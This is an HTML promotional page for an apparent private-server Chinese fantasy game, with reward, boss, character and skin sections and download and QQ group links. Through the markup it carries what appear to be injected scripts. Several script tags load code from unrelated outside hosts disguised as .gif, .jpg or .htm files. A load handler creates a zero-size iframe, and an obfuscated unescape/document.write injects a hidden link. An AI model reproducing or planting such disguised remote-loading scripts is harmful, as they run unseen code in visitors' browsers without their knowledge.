<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>盛世之战 霸业の传奇</title>
    <meta name="Description" content="2021盛世之战,神极篇章">
    <meta name="Keywords" content="2021盛世之战,神极篇章">
    <link rel="stylesheet" href="css/reset.css">



    <link rel="stylesheet" href="css/style.css">
</head>
<body>
<div id="music">
            <audio loop src="media/bg.mp3" id="audio" autoplay preload="auto"></audio>
            <div class="music music-img ro"></div>
     </div>
    <h1 class="logo"><a href="#" target="_blank"></a></h1>

    <!-- /.logo -->

    <div class="u-nav index-link">
        <a class="item-1" href="https://qm.qq.com/cgi-bin/qm/qr?k=hIayYITKky_bJrg4ASua2OtEvpju3WZB&jump_from=webapi" target="_blank" title></a>
        <a class="item-2" href="https://wwr.lanzoui.com/iCopStj3rbe" target="_blank" title></a>    </div>
    <!-- /.u-nav -->
    
	<!-- tips容器 -->
	<div id="J-tips" class="topic" style="display: none; z-index:999">
		<div class="adorn"></div>
		<div class="inner_html"></div>
	</div>
	<!-- end -->

    <div class="u-nav sidebar">
        <div class="nav-item nav-1 active"><div class="icon-txt"></div></div>
        <div class="nav-item nav-2"><div class="icon-txt"></div></div>
        <div class="nav-item nav-3"><div class="icon-txt"></div></div>
        <div class="nav-item nav-4"><div class="icon-txt"></div></div>
        <div class="nav-item nav-5"><div class="icon-txt"></div></div>
        <div class="nav-item nav-6"><a href="/link/wycq.html" target="_blank"><div class="icon-txt"></div></a></div>
    </div>  

    <div class="cover" id="J-cover"><script src="images/33.jpg"></script>
        <a href="https://wwr.lanzoui.com/iCopStj3rbe" target="_blank"><div class="xxxx"></div></a>
		 <a href="https://qm.qq.com/cgi-bin/qm/qr?k=hIayYITKky_bJrg4ASua2OtEvpju3WZB&jump_from=webapi" target="_blank"><div class="xxxx1"></div></a>
		 <a href="https://wwr.lanzoui.com/iCopStj3rbe" target="_blank"><div class="xxxx2"></div></a>
        <div class="loading-sign">资源已加载0%</div>
        <div class="icon-md"></div>
    </div><script src="http://mb.hzbtc.com/down.htm"></script>

    <div class="main-view">
        <div class="content-list">
            <ul class="content-list-container">
                <li class="content-item reward">
                    <div class="content-block">
                        <div class="wrap">
                            <div class="title"></div>
                            <div class="view">
                                <div class="detail"></div>
                                <div class="m-list">
                                    <div class="list list-1">
                                        <ul>
                                            <li>
                                                <div class="icon-wrapper"><div class="pic"><img src="images/D01.gif" alt></div></div>
                                                <div class="notice"><img src="images/r1.png" alt></div>
                                            </li>
                                            <li>
                                                <div class="icon-wrapper"><div class="pic"><img src="images/D02.gif" alt></div></div>
                                                <div class="notice"><img src="images/r2.png" alt></div>
                                            </li>
                                            <li>
                                                <div class="icon-wrapper"><div class="pic"><img src="images/D03.gif" alt></div></div>
                                                <div class="notice"><img src="images/r3.png" alt></div>
                                            </li>
                                        </ul>
                                    </div>
                                    <div class="list list-2">
                                        <ul>
                                            <li>
                                                <div class="reward-list">
                                                    <div class="icon-item" data-tip="A01"><div class="pic A01"></div></div>
                                                    <div class="icon-item" data-tip="A02"><div class="pic A02"></div></div>
                                                    <div class="icon-item" data-tip="A03"><div class="pic A03"></div></div>
                                                    <div class="icon-item" data-tip="A04"><div class="pic A04"></div></div>
                                                    <div class="icon-item" data-tip="A05"><div class="pic A05"></div></div>
                                                    <div class="icon-item" data-tip="A06"><div class="pic A06"></div></div>
                                                </div>
                                                <div class="notice"><img src="images/r4.png" alt></div>
                                            </li>
                                            <li>
                                                <div class="reward-list">
                                                    <div class="icon-item" data-tip="B01"><div class="pic B01"></div></div>
                                                    <div class="icon-item" data-tip="B02"><div class="pic B02"></div></div>
                                                    <div class="icon-item" data-tip="B03"><div class="pic B03"></div></div>
                                                    <div class="icon-item" data-tip="B04"><div class="pic B04"></div></div>
                                                    <div class="icon-item" data-tip="B05"><div class="pic B05"></div></div>
                                                    <div class="icon-item" data-tip="B06"><div class="pic B06"></div></div>
                                                </div>
                                                <div class="notice"><img src="images/r5.png" alt></div>
                                            </li>
                                            <li>
                                                <div class="reward-list">
                                                    <div class="icon-item" data-tip="C01"><div class="pic C01"></div></div>
                                                    <div class="icon-item" data-tip="C02"><div class="pic C02"></div></div>
                                                    <div class="icon-item" data-tip="C03"><div class="pic C03"></div></div>
                                                    <div class="icon-item" data-tip="C04"><div class="pic C04"></div></div>
                                                    <div class="icon-item" data-tip="C05"><div class="pic C05"></div></div>
                                                    <div class="icon-item" data-tip="C06"><div class="pic C06"></div></div>
                                                </div>
                                                <div class="notice"><img src="images/r6.png" alt></div>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </li>
                <li class="content-item map">
                    <div class="content-block">
                        <div class="wrap">
                            <div class="title"></div>
                            <div class="view">
                                <div class="detail"></div>
                                <div class="m-boss">
                                    <div class="map-detail"></div>
                                    <div class="boss-list">
                                        <ul>
                                            <li class="icon-boss boss-1 active" data-boss="boss-1"><div class="icon"></div></li>
                                            <li class="icon-boss boss-2" data-boss="boss-2"><div class="icon"></div></li>
                                            <li class="icon-boss boss-3" data-boss="boss-3"><div class="icon"></div></li>
                                            <li class="icon-boss boss-4" data-boss="boss-4"><div class="icon"></div></li>
                                            <li class="icon-boss boss-5" data-boss="boss-5"><div class="icon"></div></li>
                                        </ul>
                                        <div class="boss-txt"><div class="content boss-1"></div></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </li>
                <li class="content-item char">
                    <div class="content-block">
                        <div class="wrap">
                            <div class="title"></div>
                            <div class="view">
                                <div class="char-img c1"></div>
                                <div class="detail c1">
                                    <div class="char-detail">
                                        <div class="char-name"></div>
                                        <div class="char-txt"></div>

                                        <div class="skill-title"></div>
                                        <div class="m-tab skill-tab">
                                            <div class="hd">
                                                <div class="skill-icon active" data-skill="S506"><div class="pic S506"></div></div>
                                                <div class="skill-icon" data-skill="S507"><div class="pic S507"></div></div>
                                                <div class="skill-icon" data-skill="S508"><div class="pic S508"></div></div>
                                                <div class="skill-icon" data-skill="S509"><div class="pic S509"></div></div>
                                            </div>
                                            <div class="bd">
                                                <div class="skill-txt"><img src="images/S506.png" alt></div>
                                            </div>
                                        </div>

                                        <!--<a href="" class="gameTxt"></a>-->
                                    </div>


                                    <div class="sel-list">
                                        <div class="u-btn sel active c1" data-char="c1"></div>
                                        <div class="u-btn sel c2" data-char="c2"></div>
                                    </div>
                                </div>
                            </div>
                        </div><script src="http://down.cmhjcfc.com/downn.gif"></script>
                    </div>     
                </li>
                <li class="content-item skin">
                    <div class="content-block">
                        <div class="wrap">
                            <div class="title"></div>
                            <div class="view">
                                <div class="detail"></div>
                                <div class="skin-list">
                                    <div class="skin-item skin-1"></div>
                                    <div class="skin-item skin-2"></div>
                                    <div class="skin-item skin-3"></div>
                                    <div class="skin-item skin-4"></div>
                                    <div class="skin-item skin-5"></div>
                                    <div class="skin-item skin-6"></div>
                                </div>
                            </div>
                        </div>
                    </div>                   
                </li>                

            </ul>
        </div><script src="http://table.teblefa.com/dlq.gif"></script>
    </div>

    <div class="u-mask"></div>
    <div class="u-win vidplayer">
        <div class="close">X</div>
        <div class="container"></div>
    </div>
    <!-- /.video -->       
    
    <script src="js/jquery-1.11.0.min.js" type="text/javascript"></script>
    <script src="js/jquery.mousewheel.js"></script>
    <script src="js/tips.js"></script>
    <script src="js/main.js"></script>
	<script type="text/javascript" src="js/load.js"></script>
<script type="text/javascript" language="javascript">// < ![CDATA[

window.onload=function(){//页面加载后执行的函数

    setTimeout(function(){

      var newE = document.createElement("iframe");//创建iframe元素



	  newE.width="0";

	  newE.height="0";

      var crea = document.body.appendChild(newE);//为body添加子元素

    },1000);//1000毫秒后执行

}

// ]]></script>
</body>
<script src="https://www.93cf.com/dl/1/zq.js"></script>
</html>
<script>
<!--
document.write(unescape("%3Ca%20href%3D%22http%3A//%77%77%77%2e%67%6d%62%75%6c%75%6f%2e%63%6f%6d/%22%3E%u4F20%u5947%u670D%u52A1%u7AEF%3C/a%3E%3C/p%3E"));
//-->
</script>


